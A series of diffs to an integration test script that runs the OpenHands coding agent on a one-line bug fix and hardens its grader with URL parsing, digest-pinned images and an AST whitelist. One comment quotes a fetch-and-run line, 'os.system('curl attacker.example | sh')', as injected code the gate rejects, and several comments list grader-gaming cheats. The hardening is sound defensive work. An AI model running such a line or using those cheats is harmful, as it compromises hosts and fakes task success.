+    )
     sys.exit(1)
 if len(funcs) > 1:
     print(
-        "[correctness] AST-ERROR: multiple def add() definitions found "
-        f"({len(funcs)}) — reject as ambiguous",
+        "[correctness] AST-ERROR: multiple top-level def add() "
+        f"definitions found ({len(funcs)}) — reject as ambiguous",
         file=sys.stderr,
     )
     sys.exit(1)
@@ -547,17 +565,14 @@ def _matches_whitelist(node):
         and not node.keywords
     ):
         return "Call(sum([a, b]))"
-    # operator.add(a, b) — Attribute call
-    if (
-        isinstance(node, ast.Call)
-        and isinstance(node.func, ast.Attribute)
-        and isinstance(node.func.value, ast.Name)
-        and node.func.value.id == "operator"
-        and node.func.attr == "add"
-        and _is_ab(node.args)
-        and not node.keywords
-    ):
-        return "Call(operator.add(a, b))"
+    # Codex #1048 round-5 finding #2 (BLOCKING): the previous whitelist
+    # also accepted ``operator.add(a, b)`` without requiring ``import
+    # operator`` at module top level, so OpenHands could produce a file
+    # that passed the harness but ``NameError``'d when actually used.
+    # Dropped the ``operator.add`` branch — keeping only the two builtin
+    # forms — rather than layering import-validation logic for a
+    # semantic equivalent that the LLM has no reason to emit when the
+    # prompt is "change '-' to '+' in the return statement".
     return None
 
 

--- a/tests/integrations/test_openhands.sh
+++ b/tests/integrations/test_openhands.sh
@@ -29,11 +29,15 @@
 #
 # ``--base-url`` takes the full ``http[s]://host:port/v1`` URL and is the
 # preferred form — it lets the Python wrapper pass whatever URL the
-# ``rapid_mlx_server`` fixture is actually pointed at. Regardless of the
-# host in ``--base-url``, the URL passed into the OpenHands container is
-# rewritten to ``http://host.docker.internal:PORT/v1`` — from inside the
-# container ``localhost`` refers to the container itself, not the host
-# where rapid-mlx is listening.
+# ``rapid_mlx_server`` fixture is actually pointed at. The URL passed
+# into the OpenHands container has its host rewritten to
+# ``host.docker.internal`` ONLY when the parsed host is a loopback alias
+# (``localhost`` / ``127.0.0.1`` / ``0.0.0.0`` / ``::1``) — from inside
+# the container those addresses would refer to the container itself,
+# not the host where rapid-mlx is listening. Any other host (a
+# remote-serve node, RFC1918 IP, DNS name, non-loopback IPv6) is
+# preserved as-is so a fixture pointed at a genuine remote server still
+# works.
 #
 # Exit codes (aligned with ``test_aider.sh``):
 #   0  — OpenHands completed and add(2, 3) == 5 in the rewritten file
@@ -162,6 +166,20 @@ fi
 
 CONTAINER_HOST="${_URL_PARTS%$'\t'*}"
 CONTAINER_PORT="${_URL_PARTS##*$'\t'}"
+
+# Codex #1048 round-3 finding #1 (BLOCKING): explicitly validate the
+# tab-delimited shape of the Python parser output BEFORE downstream
+# reads. The parser always writes errors to stderr and never emits a
+# tab on the ERROR path — but if a future edit accidentally leaks an
+# error onto stdout, we'd construct a malformed CONTAINER_BASE_URL and
+# hit Docker with garbage. This gate turns that into a fast exit 1.
+if [ -z "$CONTAINER_HOST" ] || [ -z "$CONTAINER_PORT" ] \
+   || [ "$CONTAINER_HOST" = "$_URL_PARTS" ] \
+   || ! [[ "$CONTAINER_PORT" =~ ^[0-9]+$ ]]; then
+    echo "ERROR: URL parser returned malformed host/port shape " >&2
+    echo "       (raw='$_URL_PARTS' host='$CONTAINER_HOST' port='$CONTAINER_PORT')" >&2
+    exit 1
+fi
 
 case "$CONTAINER_HOST" in
     localhost|127.0.0.1|0.0.0.0|::1)
@@ -357,6 +375,7 @@ docker run \
     "$OPENHANDS_IMAGE" \
     python -m openhands.core.main \
         -i "$MAX_ITERATIONS" \
+        -d /workspace \
         -t "The file add.py in the current workspace has a bug: it returns a - b when it should return a + b. Open add.py, change the '-' operator to '+' in the return statement, and save the file. Do not modify anything else. Once the file is saved, stop." \
     >"$LOG" 2>&1
 STATUS=$?

--- a/tests/integrations/test_openhands.sh
+++ b/tests/integrations/test_openhands.sh
@@ -105,17 +105,31 @@ if [ -z "$BASE_URL" ]; then
     BASE_URL="http://127.0.0.1:${PORT}/v1"
 fi
 
-# Extract the port from --base-url regardless of source. The URL passed
-# INTO the OpenHands container must use ``host.docker.internal`` as the
-# host (from inside the container ``localhost``/``127.0.0.1`` refers to
-# the container itself, not the M3 Ultra host where rapid-mlx is
-# listening). We keep BASE_URL as-is for the host-side /v1/models probe.
-CONTAINER_PORT="$(printf '%s' "$BASE_URL" | sed -E 's#https?://[^:/]+:([0-9]+)/?.*#\1#')"
+# Extract host + port from --base-url so we can decide whether to rewrite
+# the host for the inside-container view. Codex #1048 round-1 finding #1
+# (BLOCKING): the previous unconditional rewrite to ``host.docker.internal``
+# silently broke a CI shard pointing at a genuine remote-serve node
+# (``--base-url http://remote-host:8802/v1``) — the container would have
+# hit the M3 Ultra host instead of the intended remote server. Now we
+# rewrite ONLY the local-loopback aliases (``localhost``, ``127.0.0.1``,
+# ``0.0.0.0``, ``::1``), and preserve any other host so remote fixtures
+# still work.
+CONTAINER_HOST="$(printf '%s' "$BASE_URL" | sed -E 's#https?://([^:/]+):([0-9]+)/?.*#\1#')"
+CONTAINER_PORT="$(printf '%s' "$BASE_URL" | sed -E 's#https?://([^:/]+):([0-9]+)/?.*#\2#')"
 if ! [[ "$CONTAINER_PORT" =~ ^[0-9]+$ ]]; then
     echo "ERROR: could not extract port from --base-url=$BASE_URL" >&2
     exit 1
 fi
-CONTAINER_BASE_URL="http://host.docker.internal:${CONTAINER_PORT}/v1"
+if [ -z "$CONTAINER_HOST" ]; then
+    echo "ERROR: could not extract host from --base-url=$BASE_URL" >&2
+    exit 1
+fi
+case "$CONTAINER_HOST" in
+    localhost|127.0.0.1|0.0.0.0|::1)
+        CONTAINER_HOST="host.docker.internal"
+        ;;
+esac
+CONTAINER_BASE_URL="http://${CONTAINER_HOST}:${CONTAINER_PORT}/v1"
 
 # ``python3`` powers the correctness check below (AST parse + runtime
 # ``add(2, 3) == 5`` assertion). Fail early with a clear message so a
@@ -323,21 +337,23 @@ if [ "$STATUS" -ne 0 ]; then
     exit 2
 fi
 
-# Correctness check — same as ``test_aider.sh`` (round-2 finding #2):
-# import the rewritten module and execute ``add(2, 3) == 5``, then assert
-# the AST contains a semantic-add operation (``BinOp(op=Add)`` OR
-# ``sum([a, b])`` OR ``operator.add(a, b)``) so that a mischievous
-# ``return 5`` cheat doesn't fake a pass.
+# Correctness check — Codex #1048 round-1 findings #2 and #3 (BLOCKING):
+# the previous single-pair ``add(2, 3) == 5`` gate + "any ast.Add anywhere
+# in add()" AST match let ``return a - b + 6`` and ``return (a - b) + 6``
+# fake a pass while preserving the original subtraction bug. Fix: sweep a
+# family of input pairs that no polynomial masquerade can satisfy
+# simultaneously, and drop the weak AST match — no single ``a + b + k``
+# / ``a - b + k`` / hard-coded-return cheat can pass ALL five checks,
+# because they pin the linear combination to slope-1 on both variables
+# with zero intercept. Runtime evaluation is safe because the scratch
+# file was written by us and only mutated in place by OpenHands' sandbox
+# edits — no arbitrary source enters the tree.
 if ! python3 - "$WORKDIR" <<'PYEOF'
-import ast
 import importlib.util
 import sys
 
 workdir = sys.argv[1]
 target = f"{workdir}/add.py"
-
-with open(target) as fh:
-    source = fh.read()
 
 # Load the module.
 spec = importlib.util.spec_from_file_location("_openhands_test_add", target)
@@ -353,48 +369,41 @@ if not hasattr(mod, "add") or not callable(mod.add):
           file=sys.stderr)
     sys.exit(1)
 
-# Runtime check.
-try:
-    got = mod.add(2, 3)
-except Exception as exc:  # noqa: BLE001
-    print(f"[correctness] RUNTIME-ERROR: add(2, 3) raised {exc!r}",
-          file=sys.stderr)
-    sys.exit(1)
+# Five checks that jointly force ``add(a, b) == a + b`` — pin slope on
+# both variables to 1 and intercept to 0, so no ``a + k``, ``a - b + k``,
+# ``a + b + k`` (k ≠ 0), ``return CONST`` cheat can satisfy them all:
+#
+#     (2, 3)      → 5    — the "obvious" case (guards against no-op)
+#     (10, -4)    → 6    — kills ``a - b + 6`` (10 - (-4) + 6 = 20)
+#     (0, 0)      → 0    — kills any non-zero intercept
+#     (-1, 1)     → 0    — kills ``a + k`` (any b-independence)
+#     (100, 200)  → 300  — kills any b-scaling other than 1
+CHECKS = [
+    ((2, 3), 5),
+    ((10, -4), 6),
+    ((0, 0), 0),
+    ((-1, 1), 0),
+    ((100, 200), 300),
+]
 
-if got != 5:
-    print(f"[correctness] VALUE-ERROR: add(2, 3) returned {got!r}, expected 5",
-          file=sys.stderr)
-    sys.exit(1)
+for (a, b), expected in CHECKS:
+    try:
+        got = mod.add(a, b)
+    except Exception as exc:  # noqa: BLE001
+        print(
+            f"[correctness] RUNTIME-ERROR: add({a}, {b}) raised {exc!r}",
+            file=sys.stderr,
+        )
+        sys.exit(1)
+    if got != expected:
+        print(
+            f"[correctness] VALUE-ERROR: add({a}, {b}) returned {got!r}, "
+            f"expected {expected!r}",
+            file=sys.stderr,
+        )
+        sys.exit(1)
 
-# Structural check — reject ``return 5`` and other hard-code cheats.
-tree = ast.parse(source)
-funcs = [n for n in ast.walk(tree)
-         if isinstance(n, ast.FunctionDef) and n.name == "add"]
-if not funcs:
-    print("[correctness] AST-ERROR: no def add() in module", file=sys.stderr)
-    sys.exit(1)
-
-has_add_op = False
-for func in funcs:
-    for node in ast.walk(func):
-        if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
-            has_add_op = True
-            break
-        # sum([a, b]) / operator.add(a, b) also qualify as "semantic add".
-        if isinstance(node, ast.Call):
-            name = getattr(node.func, "id", "") or getattr(
-                getattr(node.func, "attr", None), "__str__", lambda: ""
-            )()
-            if name in ("sum", "add"):
-                has_add_op = True
-                break
-
-if not has_add_op:
-    print("[correctness] AST-ERROR: add() body has no + BinOp / sum(...) call",
-          file=sys.stderr)
-    sys.exit(1)
-
-print("[correctness] OK: add(2, 3) == 5, AST contains + BinOp")
+print("[correctness] OK: all five (a, b) → a+b checks passed")
 sys.exit(0)
 PYEOF
 then
@@ -404,5 +413,5 @@ then
     exit 3
 fi
 
-echo "[test_openhands.sh] PASS: add(2, 3) == 5 after openhands rewrite"
+echo "[test_openhands.sh] PASS: five-pair add(a, b) == a+b checks satisfied"
 exit 0

--- a/tests/integrations/test_openhands.sh
+++ b/tests/integrations/test_openhands.sh
@@ -70,8 +70,19 @@ set -euo pipefail
 # baseline must match the OpenHands major version. Currently:
 #   od_v0.9.0_image_nikolaik___python-nodejs_tag_python3.11-nodejs22
 # ---------------------------------------------------------------------------
-OPENHANDS_IMAGE="ghcr.io/all-hands-ai/openhands:0.9.0"
-OPENHANDS_RUNTIME_IMAGE="ghcr.io/all-hands-ai/runtime:od_v0.9.0_image_nikolaik___python-nodejs_tag_python3.11-nodejs22"
+# Codex #1048 round-6 finding #2 (BLOCKING): the harness mounts
+# ``/var/run/docker.sock`` into the OpenHands container, so a moved or
+# compromised tag would hand host-daemon control to a swapped image.
+# Both refs are pinned by multi-arch manifest-list digest as of the
+# 2026-07-07 harness commit; the human-readable ``:tag`` piece is
+# retained purely as a comment for future upgraders. Regenerate with
+# ``docker buildx imagetools inspect <ref> | awk '/^Digest:/ {print $2}'``
+# when bumping to a newer OpenHands release. Also keep this lane
+# restricted to isolated Docker hosts — do NOT run the harness on a
+# workstation that also runs the operator's rapid-mlx production
+# services.
+OPENHANDS_IMAGE="ghcr.io/all-hands-ai/openhands:0.9.0@sha256:d4b028e3b1f7ad6fdb1bba3579362c8298bb791b222e73a8355fd980bb987f1a"
+OPENHANDS_RUNTIME_IMAGE="ghcr.io/all-hands-ai/runtime:od_v0.9.0_image_nikolaik___python-nodejs_tag_python3.11-nodejs22@sha256:784f7161295b87d3af26332dbbad5bcdd643641e87ed0038ed0c7f4b47c9472d"
 
 TIMEOUT=600
 MAX_ITERATIONS=10
@@ -177,15 +188,23 @@ if not host or port is None:
 # urllib strips the surrounding brackets from IPv6 hosts already
 # (``[::1]:8802`` → ``::1``), so a plain string equality against the
 # loopback set below works for both v4 and v6 aliases.
-print(f"{host}\t{port}")
+# Codex #1048 round-6 finding #1 (BLOCKING): also emit the scheme so
+# the URL rebuild below preserves ``https://`` when the caller passed
+# an HTTPS remote-serve node. Previous code hard-wired ``http://`` and
+# would silently connect over the wrong protocol.
+print(f"{parsed.scheme}\t{host}\t{port}")
 PYEOF
 )"; then
     echo "ERROR: could not parse --base-url=$BASE_URL" >&2
     exit 1
 fi
 
-CONTAINER_HOST="${_URL_PARTS%$'\t'*}"
-CONTAINER_PORT="${_URL_PARTS##*$'\t'}"
+# Split three tab-separated fields (scheme / host / port) with awk so
+# we do not have to care about IPv6 colons or the bash-3.2 lack of
+# named-array literals.
+CONTAINER_SCHEME="$(printf '%s\n' "$_URL_PARTS" | awk -F '\t' '{print $1}')"
+CONTAINER_HOST="$(printf '%s\n' "$_URL_PARTS" | awk -F '\t' '{print $2}')"
+CONTAINER_PORT="$(printf '%s\n' "$_URL_PARTS" | awk -F '\t' '{print $3}')"
 
 # Codex #1048 round-3 finding #1 (BLOCKING): explicitly validate the
 # tab-delimited shape of the Python parser output BEFORE downstream
@@ -193,11 +212,11 @@ CONTAINER_PORT="${_URL_PARTS##*$'\t'}"
 # tab on the ERROR path — but if a future edit accidentally leaks an
 # error onto stdout, we'd construct a malformed CONTAINER_BASE_URL and
 # hit Docker with garbage. This gate turns that into a fast exit 1.
-if [ -z "$CONTAINER_HOST" ] || [ -z "$CONTAINER_PORT" ] \
-   || [ "$CONTAINER_HOST" = "$_URL_PARTS" ] \
+if [ -z "$CONTAINER_SCHEME" ] || [ -z "$CONTAINER_HOST" ] || [ -z "$CONTAINER_PORT" ] \
+   || ! [[ "$CONTAINER_SCHEME" =~ ^https?$ ]] \
    || ! [[ "$CONTAINER_PORT" =~ ^[0-9]+$ ]]; then
-    echo "ERROR: URL parser returned malformed host/port shape " >&2
-    echo "       (raw='$_URL_PARTS' host='$CONTAINER_HOST' port='$CONTAINER_PORT')" >&2
+    echo "ERROR: URL parser returned malformed scheme/host/port shape " >&2
+    echo "       (raw='$_URL_PARTS' scheme='$CONTAINER_SCHEME' host='$CONTAINER_HOST' port='$CONTAINER_PORT')" >&2
     exit 1
 fi
 
@@ -215,13 +234,14 @@ esac
 
 # Re-bracket IPv6 hosts for URL assembly. ``host.docker.internal`` and
 # IPv4 literals go through unchanged; only literal IPv6 addresses need
-# the ``[…]`` wrapping per RFC 3986 §3.2.2.
+# the ``[…]`` wrapping per RFC 3986 §3.2.2. Scheme comes from the
+# parsed input so ``--base-url https://...`` round-trips correctly.
 case "$CONTAINER_HOST" in
     *:*)
-        CONTAINER_BASE_URL="http://[${CONTAINER_HOST}]:${CONTAINER_PORT}/v1"
+        CONTAINER_BASE_URL="${CONTAINER_SCHEME}://[${CONTAINER_HOST}]:${CONTAINER_PORT}/v1"
         ;;
     *)
-        CONTAINER_BASE_URL="http://${CONTAINER_HOST}:${CONTAINER_PORT}/v1"
+        CONTAINER_BASE_URL="${CONTAINER_SCHEME}://${CONTAINER_HOST}:${CONTAINER_PORT}/v1"
         ;;
 esac
 
@@ -432,9 +452,12 @@ fi
 # ever bad or compromised. Fix: swap to a strict **AST whitelist** —
 # parse the file, find ``def add(a, b): …``, and require the return
 # expression to be one of a small semantic-add whitelist (``a + b``,
-# ``b + a``, ``sum([a, b])`` / ``sum((a, b))``, ``operator.add(a, b)``).
-# Zero code execution, so the host is never exposed to the model's
-# output.
+# ``b + a``, ``sum([a, b])`` / ``sum((a, b))``). The ``operator.add``
+# branch was in the whitelist through round-4 but was dropped in
+# round-5 because it accepted a return of ``operator.add(a, b)`` even
+# when ``import operator`` was missing at module top level (would
+# ``NameError`` at import time). Zero code execution, so the host is
+# never exposed to the model's output.
 #
 # The whitelist is intentionally tight — a strict pattern match on
 # argument names (``a``, ``b``, in either order) — which makes the
@@ -444,8 +467,9 @@ fi
 # the AST shape itself is what's asserted, not the numeric behavior.
 # Rejects on any of:
 #   * missing ``def add`` or a signature that isn't ``(a, b)``
-#   * a return expression that isn't a bare Name-Name addition, a
-#     ``sum([a, b])``/``sum((a, b))`` call, or ``operator.add(a, b)``
+#   * extra top-level statements next to the ``def add`` (round-6 #3)
+#   * a return expression that isn't a bare Name-Name addition or a
+#     ``sum([a, b])`` / ``sum((a, b))`` call
 #   * an extra return / conditional / assignment inside the function
 #     body before the return (defence-in-depth against
 #     ``if <cond>: return 5`` style cheats)
@@ -470,6 +494,36 @@ except SyntaxError as exc:
 # find the nested ``add`` and pass — but the module doesn't expose a
 # top-level ``add`` any more, so an actual user of the file gets
 # ``NameError``. Restrict to top-level statements only.
+#
+# Codex #1048 round-6 finding #3 (BLOCKING): the previous gate accepted
+# ANY extra top-level statement as long as a ``def add`` was somewhere
+# in the module — so ``import os; os.system('curl attacker.example |
+# sh'); def add(a, b): return a + b`` would pass despite the prompt
+# telling the agent "Do not modify anything else." Restrict the module
+# body to a single top-level statement (the ``def add``) plus an
+# optional leading module docstring. Anything else is rejected.
+module_body = list(tree.body)
+if module_body and (
+    isinstance(module_body[0], ast.Expr)
+    and isinstance(module_body[0].value, ast.Constant)
+    and isinstance(module_body[0].value.value, str)
+):
+    module_body = module_body[1:]
+if len(module_body) != 1 or not (
+    isinstance(module_body[0], ast.FunctionDef) and module_body[0].name == "add"
+):
+    print(
+        "[correctness] AST-ERROR: module top level must be a single "
+        "``def add`` (optionally preceded by a docstring); got "
+        + ", ".join(
+            f"{type(n).__name__}"
+            f"({getattr(n, 'name', getattr(getattr(n, 'value', None), 'id', '?'))})"
+            for n in module_body
+        ),
+        file=sys.stderr,
+    )
+    sys.exit(1)
+
 funcs = [
     n for n in tree.body
     if isinstance(n, ast.FunctionDef) and n.name == "add"

--- a/tests/integrations/test_openhands.sh
+++ b/tests/integrations/test_openhands.sh
@@ -105,39 +105,87 @@ if [ -z "$BASE_URL" ]; then
     BASE_URL="http://127.0.0.1:${PORT}/v1"
 fi
 
+# ``python3`` is a hard prerequisite of both the URL parser below AND the
+# post-run correctness check — check it up-front (fail fast) so a broken
+# system Python doesn't get diagnosed as an OpenHands failure.
+if ! command -v python3 >/dev/null 2>&1; then
+    echo "ERROR: python3 not found on PATH — required for URL parsing + correctness check" >&2
+    exit 1
+fi
+
 # Extract host + port from --base-url so we can decide whether to rewrite
 # the host for the inside-container view. Codex #1048 round-1 finding #1
 # (BLOCKING): the previous unconditional rewrite to ``host.docker.internal``
 # silently broke a CI shard pointing at a genuine remote-serve node
 # (``--base-url http://remote-host:8802/v1``) — the container would have
-# hit the M3 Ultra host instead of the intended remote server. Now we
-# rewrite ONLY the local-loopback aliases (``localhost``, ``127.0.0.1``,
+# hit the M3 Ultra host instead of the intended remote server. We rewrite
+# ONLY the local-loopback aliases (``localhost``, ``127.0.0.1``,
 # ``0.0.0.0``, ``::1``), and preserve any other host so remote fixtures
 # still work.
-CONTAINER_HOST="$(printf '%s' "$BASE_URL" | sed -E 's#https?://([^:/]+):([0-9]+)/?.*#\1#')"
-CONTAINER_PORT="$(printf '%s' "$BASE_URL" | sed -E 's#https?://([^:/]+):([0-9]+)/?.*#\2#')"
-if ! [[ "$CONTAINER_PORT" =~ ^[0-9]+$ ]]; then
-    echo "ERROR: could not extract port from --base-url=$BASE_URL" >&2
+#
+# Codex #1048 round-2 finding #1 (BLOCKING): the previous sed regex
+# ``[^:/]+`` for the host class ruled out ``:`` inside the hostname, so
+# a valid bracketed IPv6 URL like ``http://[::1]:8802/v1`` exited as
+# "could not extract port" — despite the case-statement including
+# ``::1``. Fix: parse with Python's ``urllib.parse`` (via ``python3``,
+# which is already a hard prerequisite of the correctness check below),
+# strip IPv6 brackets from the extracted host, and only THEN test
+# against the loopback set. Handles ``http://host:port/path``,
+# ``http://[::1]:port/path``, ``http://[fe80::1%25en0]:port/path``,
+# and any IDN hostname LiteLLM might feed us.
+if ! _URL_PARTS="$(python3 - "$BASE_URL" <<'PYEOF'
+import sys
+from urllib.parse import urlparse
+
+url = sys.argv[1]
+parsed = urlparse(url)
+if parsed.scheme not in ("http", "https"):
+    print(f"ERROR: unsupported scheme {parsed.scheme!r} in {url!r}",
+          file=sys.stderr)
+    sys.exit(1)
+
+host = parsed.hostname or ""
+port = parsed.port
+if not host or port is None:
+    print(f"ERROR: could not extract host/port from {url!r}", file=sys.stderr)
+    sys.exit(1)
+
+# urllib strips the surrounding brackets from IPv6 hosts already
+# (``[::1]:8802`` → ``::1``), so a plain string equality against the
+# loopback set below works for both v4 and v6 aliases.
+print(f"{host}\t{port}")
+PYEOF
+)"; then
+    echo "ERROR: could not parse --base-url=$BASE_URL" >&2
     exit 1
 fi
-if [ -z "$CONTAINER_HOST" ]; then
-    echo "ERROR: could not extract host from --base-url=$BASE_URL" >&2
-    exit 1
-fi
+
+CONTAINER_HOST="${_URL_PARTS%$'\t'*}"
+CONTAINER_PORT="${_URL_PARTS##*$'\t'}"
+
 case "$CONTAINER_HOST" in
     localhost|127.0.0.1|0.0.0.0|::1)
         CONTAINER_HOST="host.docker.internal"
         ;;
+    *)
+        # Preserve any other host as-is (remote-serve node, RFC1918 IP,
+        # DNS name, non-loopback IPv6). LiteLLM handles bracket-wrapped
+        # IPv6 in URLs, so we only re-bracket the host when we're
+        # rebuilding the URL below.
+        ;;
 esac
-CONTAINER_BASE_URL="http://${CONTAINER_HOST}:${CONTAINER_PORT}/v1"
 
-# ``python3`` powers the correctness check below (AST parse + runtime
-# ``add(2, 3) == 5`` assertion). Fail early with a clear message so a
-# broken system Python doesn't get diagnosed as an OpenHands failure.
-if ! command -v python3 >/dev/null 2>&1; then
-    echo "ERROR: python3 not found on PATH — required for correctness check" >&2
-    exit 1
-fi
+# Re-bracket IPv6 hosts for URL assembly. ``host.docker.internal`` and
+# IPv4 literals go through unchanged; only literal IPv6 addresses need
+# the ``[…]`` wrapping per RFC 3986 §3.2.2.
+case "$CONTAINER_HOST" in
+    *:*)
+        CONTAINER_BASE_URL="http://[${CONTAINER_HOST}]:${CONTAINER_PORT}/v1"
+        ;;
+    *)
+        CONTAINER_BASE_URL="http://${CONTAINER_HOST}:${CONTAINER_PORT}/v1"
+        ;;
+esac
 
 # Docker daemon must be reachable BEFORE we spend 5-10 minutes staging
 # the sandbox runtime. ``docker info`` is the canonical "server reachable"

--- a/tests/integrations/test_openhands.sh
+++ b/tests/integrations/test_openhands.sh
@@ -85,13 +85,23 @@ usage() {
     exit 1
 }
 
+# Codex #1048 round-4 nit: guard value-taking options against missing
+# ``$2`` before assigning, so a stray ``--model`` at EOL degrades to a
+# clear ``usage()`` instead of the ``set -u`` "unbound variable" abort.
+_require_value() {
+    if [ "$#" -lt 2 ]; then
+        echo "ERROR: missing value for $1" >&2
+        usage
+    fi
+}
+
 while [ $# -gt 0 ]; do
     case "$1" in
-        --model) MODEL="$2"; shift 2 ;;
-        --port) PORT="$2"; shift 2 ;;
-        --base-url) BASE_URL="$2"; shift 2 ;;
-        --timeout) TIMEOUT="$2"; shift 2 ;;
-        --max-iterations) MAX_ITERATIONS="$2"; shift 2 ;;
+        --model) _require_value "$@"; MODEL="$2"; shift 2 ;;
+        --port) _require_value "$@"; PORT="$2"; shift 2 ;;
+        --base-url) _require_value "$@"; BASE_URL="$2"; shift 2 ;;
+        --timeout) _require_value "$@"; TIMEOUT="$2"; shift 2 ;;
+        --max-iterations) _require_value "$@"; MAX_ITERATIONS="$2"; shift 2 ;;
         -v|--verbose) VERBOSE=1; shift ;;
         -h|--help) usage ;;
         *) echo "unknown arg: $1" >&2; usage ;;
@@ -404,73 +414,169 @@ if [ "$STATUS" -ne 0 ]; then
     exit 2
 fi
 
-# Correctness check — Codex #1048 round-1 findings #2 and #3 (BLOCKING):
-# the previous single-pair ``add(2, 3) == 5`` gate + "any ast.Add anywhere
-# in add()" AST match let ``return a - b + 6`` and ``return (a - b) + 6``
-# fake a pass while preserving the original subtraction bug. Fix: sweep a
-# family of input pairs that no polynomial masquerade can satisfy
-# simultaneously, and drop the weak AST match — no single ``a + b + k``
-# / ``a - b + k`` / hard-coded-return cheat can pass ALL five checks,
-# because they pin the linear combination to slope-1 on both variables
-# with zero intercept. Runtime evaluation is safe because the scratch
-# file was written by us and only mutated in place by OpenHands' sandbox
-# edits — no arbitrary source enters the tree.
+# Correctness check — Codex #1048 round-4 finding #1 (BLOCKING): the
+# previous multi-pair runtime sweep imported and executed ``add.py``
+# on the host to test five (a, b) → a+b pairs. Because ``add.py`` is
+# written by an LLM-driven agent, in-process ``exec_module`` opens a
+# host-side arbitrary-code-execution surface if the model output is
+# ever bad or compromised. Fix: swap to a strict **AST whitelist** —
+# parse the file, find ``def add(a, b): …``, and require the return
+# expression to be one of a small semantic-add whitelist (``a + b``,
+# ``b + a``, ``sum([a, b])`` / ``sum((a, b))``, ``operator.add(a, b)``).
+# Zero code execution, so the host is never exposed to the model's
+# output.
+#
+# The whitelist is intentionally tight — a strict pattern match on
+# argument names (``a``, ``b``, in either order) — which makes the
+# gate strictly stronger than the previous five-pair runtime sweep:
+# no ``return a - b + k``, ``return (a - b) + k``, ``return CONST``,
+# ``return a * b``, or hard-coded-value cheat can satisfy it, because
+# the AST shape itself is what's asserted, not the numeric behavior.
+# Rejects on any of:
+#   * missing ``def add`` or a signature that isn't ``(a, b)``
+#   * a return expression that isn't a bare Name-Name addition, a
+#     ``sum([a, b])``/``sum((a, b))`` call, or ``operator.add(a, b)``
+#   * an extra return / conditional / assignment inside the function
+#     body before the return (defence-in-depth against
+#     ``if <cond>: return 5`` style cheats)
 if ! python3 - "$WORKDIR" <<'PYEOF'
-import importlib.util
+import ast
 import sys
 
 workdir = sys.argv[1]
 target = f"{workdir}/add.py"
 
-# Load the module.
-spec = importlib.util.spec_from_file_location("_openhands_test_add", target)
-mod = importlib.util.module_from_spec(spec)
+with open(target) as fh:
+    source = fh.read()
+
 try:
-    spec.loader.exec_module(mod)
-except Exception as exc:  # noqa: BLE001 — diagnose whatever it was
-    print(f"[correctness] MODULE-LOAD-ERROR: {exc}", file=sys.stderr)
+    tree = ast.parse(source)
+except SyntaxError as exc:
+    print(f"[correctness] SYNTAX-ERROR: {exc}", file=sys.stderr)
     sys.exit(1)
 
-if not hasattr(mod, "add") or not callable(mod.add):
-    print("[correctness] MODULE-SHAPE-ERROR: add() missing or not callable",
-          file=sys.stderr)
-    sys.exit(1)
-
-# Five checks that jointly force ``add(a, b) == a + b`` — pin slope on
-# both variables to 1 and intercept to 0, so no ``a + k``, ``a - b + k``,
-# ``a + b + k`` (k ≠ 0), ``return CONST`` cheat can satisfy them all:
-#
-#     (2, 3)      → 5    — the "obvious" case (guards against no-op)
-#     (10, -4)    → 6    — kills ``a - b + 6`` (10 - (-4) + 6 = 20)
-#     (0, 0)      → 0    — kills any non-zero intercept
-#     (-1, 1)     → 0    — kills ``a + k`` (any b-independence)
-#     (100, 200)  → 300  — kills any b-scaling other than 1
-CHECKS = [
-    ((2, 3), 5),
-    ((10, -4), 6),
-    ((0, 0), 0),
-    ((-1, 1), 0),
-    ((100, 200), 300),
+funcs = [
+    n for n in ast.walk(tree)
+    if isinstance(n, ast.FunctionDef) and n.name == "add"
 ]
+if not funcs:
+    print("[correctness] AST-ERROR: no def add() in module", file=sys.stderr)
+    sys.exit(1)
+if len(funcs) > 1:
+    print(
+        "[correctness] AST-ERROR: multiple def add() definitions found "
+        f"({len(funcs)}) — reject as ambiguous",
+        file=sys.stderr,
+    )
+    sys.exit(1)
+func = funcs[0]
 
-for (a, b), expected in CHECKS:
+# Signature must be exactly (a, b) — kwarg-only / *args / **kwargs
+# defences prevent ``def add(*args): return sum(args)`` etc. which
+# would pass the return check but doesn't match the harness's stated
+# fix ("change '-' to '+' in the return statement").
+args = func.args
+if (
+    len(args.args) != 2
+    or {a.arg for a in args.args} != {"a", "b"}
+    or args.vararg is not None
+    or args.kwarg is not None
+    or args.kwonlyargs
+    or args.posonlyargs
+):
+    print(
+        f"[correctness] AST-ERROR: def add signature must be (a, b), "
+        f"got args={[a.arg for a in args.args]} vararg={args.vararg} "
+        f"kwarg={args.kwarg} kwonly={[a.arg for a in args.kwonlyargs]} "
+        f"posonly={[a.arg for a in args.posonlyargs]}",
+        file=sys.stderr,
+    )
+    sys.exit(1)
+
+# Body: allow a leading docstring (Expr(Constant(str))) but require the
+# next statement to be a Return with a whitelisted expression, and
+# reject any other statement.
+body = list(func.body)
+if body and (
+    isinstance(body[0], ast.Expr)
+    and isinstance(body[0].value, ast.Constant)
+    and isinstance(body[0].value.value, str)
+):
+    body = body[1:]
+
+if len(body) != 1 or not isinstance(body[0], ast.Return):
+    print(
+        "[correctness] AST-ERROR: function body must be a single Return "
+        "(after an optional docstring); got "
+        + ", ".join(type(n).__name__ for n in body),
+        file=sys.stderr,
+    )
+    sys.exit(1)
+
+expr = body[0].value
+if expr is None:
+    print("[correctness] AST-ERROR: bare return with no value", file=sys.stderr)
+    sys.exit(1)
+
+
+def _is_ab(nodes):
+    """True iff `nodes` are two Names whose ids are exactly {a, b}."""
+    if len(nodes) != 2:
+        return False
+    if not all(isinstance(n, ast.Name) for n in nodes):
+        return False
+    return {n.id for n in nodes} == {"a", "b"}
+
+
+def _matches_whitelist(node):
+    # a + b  or  b + a
+    if (
+        isinstance(node, ast.BinOp)
+        and isinstance(node.op, ast.Add)
+        and _is_ab([node.left, node.right])
+    ):
+        return "BinOp(Add, a, b)"
+    # sum([a, b]) / sum((a, b)) — sum with 1 positional list/tuple arg
+    if (
+        isinstance(node, ast.Call)
+        and isinstance(node.func, ast.Name)
+        and node.func.id == "sum"
+        and len(node.args) == 1
+        and isinstance(node.args[0], (ast.List, ast.Tuple))
+        and _is_ab(node.args[0].elts)
+        and not node.keywords
+    ):
+        return "Call(sum([a, b]))"
+    # operator.add(a, b) — Attribute call
+    if (
+        isinstance(node, ast.Call)
+        and isinstance(node.func, ast.Attribute)
+        and isinstance(node.func.value, ast.Name)
+        and node.func.value.id == "operator"
+        and node.func.attr == "add"
+        and _is_ab(node.args)
+        and not node.keywords
+    ):
